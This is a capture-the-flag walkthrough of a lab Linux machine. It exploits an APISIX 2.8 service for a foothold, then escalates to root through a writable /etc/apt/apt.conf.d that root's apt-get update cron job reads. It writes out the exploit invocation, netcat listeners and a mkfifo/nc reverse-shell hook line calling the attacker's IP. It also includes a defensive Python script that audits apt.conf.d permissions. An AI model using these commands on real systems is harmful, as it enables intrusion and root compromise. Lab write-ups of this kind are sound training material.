Basic Information: PG Practice Linux Machine, Level Easy, Target IP: 192.168.248.220

TL;DR for those who only want a quick solution. 

  1. Found port 43500 is vulnerable to exploit 50829; exploiting it grants you the initial foothold.
  2. /etc/apt/apt.conf.d directory is writable.

Initial Enumeration

Keep scanning for version information.
sudo nmap -sS 192.168.248.220 -p22,80,3306,43500 -vv -sV -A

  1. 22, a regular open SSH port; normally you don’t get the initial foothold from there.
  2. 80, HTTP port, title Upright, nginx/1.18.0
  3. 3306, MySQL (unauthorized)
  4. 43500, OpenResty web app server, header showing APISIX/2.8

We’ll start by taking a look at the web port 80 first, visiting http://192.168.248.220

content of port 80

  1. Nothing too special, just a website; clicking most of the buttons returns you to the home page. Understandable, this is a CTF VM, no need to make it too functional. Using curl + grep and sed to find all the href keywords on the site, I found nothing useful.
    1. One piece of information that could be useful is the email address [email protected]
  2. Obviously ports 3306 and 43500 are very suspicious, but I would like to go through my regular pentest steps, that is, enumerate the directories on the target’s web port 80 first. I normally use gobuster with dirb’s big.txt wordlist.
    1. gobuster dir --url "http://192.168.248.220" -w /usr/share/wordlists/dirb/big.txt
  3. Based on past experience, we don’t need to care about the three folders found; they don’t contain anything.

Now let’s move on to port 3306: running mysql -h 192.168.248.220 shows that the connection is not allowed.

Our only hope is port 43500; visiting the site shows nothing but an error message.

  1. Remember that the port scan showed the title of web port 43500 as APISIX/2.8; now let’s search for it on exploit-db.com, or use searchsploit in Kali’s terminal.
  2. Found one, the id is 50829; let’s grab it using searchsploit -m 50829, and then take a look at how to use it.
  3. The header shows the exploit works against APISIX 1.3 – 2.12.1; our target’s version is APISIX 2.8, so technically that should work.
  4. Take a look at the usage
    1. The arguments are target_url, lhost and lport

Initial Foothold

Previously we found the exploit 50829.py; now let’s use it against our target.

  1. Before running it, set up a netcat listener first
    1. nc -nlvp 443
  2. Run the exploit
    1. python3 50829.py http://192.168.248.220:43500/ 192.168.45.235 443
  3. Nice, the exploit is working, we are franklin on this system. But there is a problem: running ls -la shows permission denied. Typing pwd shows we are in the /root directory.
  4. To solve this issue, we’ll go to /home/franklin, but before that we switch to an interactive shell first; we’ll use
    1. python3 -c 'import pty;pty.spawn("/bin/bash")'
  5. At /home/franklin, we found local.txt, that’s the unprivileged flag.

Now we need to escalate the privilege

Privilege Escalation

Normally I’ll manually enumerate the system first, I’ll try

  1. sudo -l
    1. to see if I could run any command with sudo
  2. find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
    1. to find any unusual SUID bit set on some binaries; if there is any, look it up on https://gtfobins.github.io/# to see how to exploit it.
    2. Actually I found /bin/ssh-agent’s SUID bit is set, but it is not exploitable.

I also tried to look into some files to see if there is any sensitive credential; unluckily I found nothing. This is where I deploy linpeas.sh (https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS), it’s smarter and stronger than me.

  1. Deliver linpeas.sh to franklin’s reverse shell, chmod +x linpeas.sh to grant it execution permission, then run it.
  2. Found this key piece of information: I, as franklin, could write to /etc/apt/apt.conf.d. Though the output said I could look it up on the given link https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files, I could not find a solution there. But it’s not too difficult to use Google: just google "etc apt apt.conf.d privilege escalation"; I found this page to be very useful: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/
    1. To make the exploit work, it requires someone with root privilege to run apt-get update
    2. Looking into /etc/crontab, we see that the root user’s scheduled task runs apt-get update, which means we could escalate privileges via /etc/apt/apt.conf.d
  3. Now we set up another netcat listener. I normally use port numbers that are allowed through the firewall, like 443, 445, 22, 53, etc.
    1. nc -nlvp 445
  4. At franklin’s reverse shell, type the following commands; we should expect a reverse shell very soon.
    1. cd /etc/apt/apt.conf.d
    2. echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.235 445 >/tmp/f"};' > pwn
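The weakness behind this escalation is an apt.conf.d drop-in directory that a non-root user can write to, combined with root running apt-get update from cron. The audit script below is an added example (not from the original walkthrough or any tool it mentions) that a defender can point at /etc/apt/apt.conf.d to catch exactly that: it flags a directory or file writable by anyone but root and lists any Pre-Invoke/Post-Invoke hook directives apt would execute. The demo directory it builds in a temp folder, the file names 20auto-upgrades and 99pwn, and the placeholder hook command are constructed for the example.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# apt executes these directives as root, so a drop-in that an unprivileged
# user can create or edit is a root code-execution path.
HOOK_RE = re.compile(
    r"(?i)\b(APT::Update::(?:Pre|Post)-Invoke(?:-Success)?|DPkg::(?:Pre|Post)-Invoke)\b"
)

def find_hooks(text):
    """Return the hook directive names present in one apt.conf fragment."""
    return sorted({m.group(1) for m in HOOK_RE.finditer(text)})

def writable_by_untrusted(st, trusted_uid=0):
    """True if ownership or mode bits let a user other than trusted_uid write."""
    return st.st_uid != trusted_uid or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_apt_conf_dir(conf_dir, trusted_uid=0):
    """Return (path, issue) findings for conf_dir and its drop-in files."""
    conf_dir = Path(conf_dir)
    findings = []
    if writable_by_untrusted(conf_dir.stat(), trusted_uid):
        findings.append((str(conf_dir), "directory writable: any user can drop a hook file"))
    for f in sorted(p for p in conf_dir.iterdir() if p.is_file()):
        if writable_by_untrusted(f.stat(), trusted_uid):
            findings.append((str(f), "file writable by an untrusted user"))
        hooks = find_hooks(f.read_text(errors="replace"))
        if hooks:
            findings.append((str(f), "runs as root on apt-get update: " + ", ".join(hooks)))
    return findings

def build_demo_dir():
    """Constructed sample mirroring the box: world-writable dir plus a dropped hook."""
    d = Path(tempfile.mkdtemp(prefix="apt.conf.d-demo-"))
    samples = {
        "20auto-upgrades": 'APT::Periodic::Update-Package-Lists "1";\n',
        "99pwn": 'apt::Update::Pre-Invoke {"/tmp/placeholder-command";};\n',  # placeholder, not the post's payload
    }
    for name, body in samples.items():
        (d / name).write_text(body)
        os.chmod(d / name, 0o644)
    os.chmod(d, 0o777)  # the weakness linpeas reported on this machine
    return str(d)

def demo_findings():
    """Audit the constructed sample, trusting the current user as the owner."""
    return audit_apt_conf_dir(build_demo_dir(), trusted_uid=os.getuid())
```

On a real host run audit_apt_conf_dir("/etc/apt/apt.conf.d") as-is, which trusts only root as owner; any finding there is worth a ticket, and the fix on this box is simply restoring the directory to root-owned mode 0755.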

Mission Accomplished!